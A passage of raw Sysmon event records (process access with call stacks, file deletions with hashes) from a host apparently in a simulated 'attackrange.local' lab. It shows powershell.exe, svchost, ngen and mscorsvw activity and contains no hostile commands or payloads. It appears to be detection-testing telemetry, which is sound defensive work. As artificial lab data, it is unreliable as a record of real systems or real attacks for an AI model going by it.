\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}66082488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.648{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF120305.TMPMD5=8554CEE29C03241DFB5882E9984AA700,SHA256=FB6542D6D734A4D8C127624D80AED6D404A14B78F01E3564E0322ACDDB2A2FB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
10341000x800000000000000022739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3B05-00000000CF01}6872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.336{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000022735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.336{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000022734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.336{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000022733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.321{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.321{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2C00-00000000CF01}2184C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.321{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3B05-00000000CF01}6872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.321{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3B05-00000000CF01}6872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000022729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.305{4DB9351A-A273-60D3-3A05-00000000CF01}6860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VFS2QXL4M\Microsoft.Build.Engine.ni.dll.auxMD5=BF92107E0576E4D198F6D068DC662A2D,SHA256=0BD7D92847C86B6FF5C430CD99C181331EF8418B7A7A205C11703AFD97E245DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.305{4DB9351A-A273-60D3-3A05-00000000CF01}6860NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VFS2QXL4M\Microsoft.Build.Engine.ni.dllMD5=FD41C3F7BE2F404019F7E1282FDAAC56,SHA256=0EE416BD58E8FA138B37C3A3ADF6CB2BFDFE022A253CE9D91FDA5096079139FD,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.211{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3A05-00000000CF01}6860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.211{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CDDA2AC9D3E3E383AD56F1408B2B686,SHA256=0498473498B7E6AAFEC2FBB7D68D864313C9E455A10642BDC06B4161D2346D66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3A05-00000000CF01}6860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3A05-00000000CF01}6860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0c
d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-A273-60D3-3905-00000000CF01}6492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1DSIK2ISDR\Microsoft.Build.Conversion.v4.0.ni.dll.auxMD5=7E87C3593F0EC212480E2F9F4FC5E27C,SHA256=7095A1E5C6A0ACE9F4167AEB85B216873EFA166DA4989D0F16DA01D98E695CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.196{4DB9351A-A273-60D3-3905-00000000CF01}6492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1DSIK2ISDR\Microsoft.Build.Conversion.v4.0.ni.dllMD5=7080035273A93A2ABF2C55C15C958AC5,SHA256=91C98F2D2DE4B536E70E8870E0ABA5CA1083538FBAD1913532A4080EF6802BF2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3905-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3905-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:59.149{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3905-00000000CF01}6492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.149{4DB9351A-A272-60D3-3805-00000000CF01}6792NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\UC5YTL9VOT\Microsoft.Build.ni.dll.auxMD5=6CB9F3672088B4E14F0A99EF6E13053E,SHA256=989EE2536A29D7EBF2A41CAACA88841CE117D55FDD2E1E90DB70FD3B86105218,IMPHASH=00000000000000000000000000000000falsetrue 
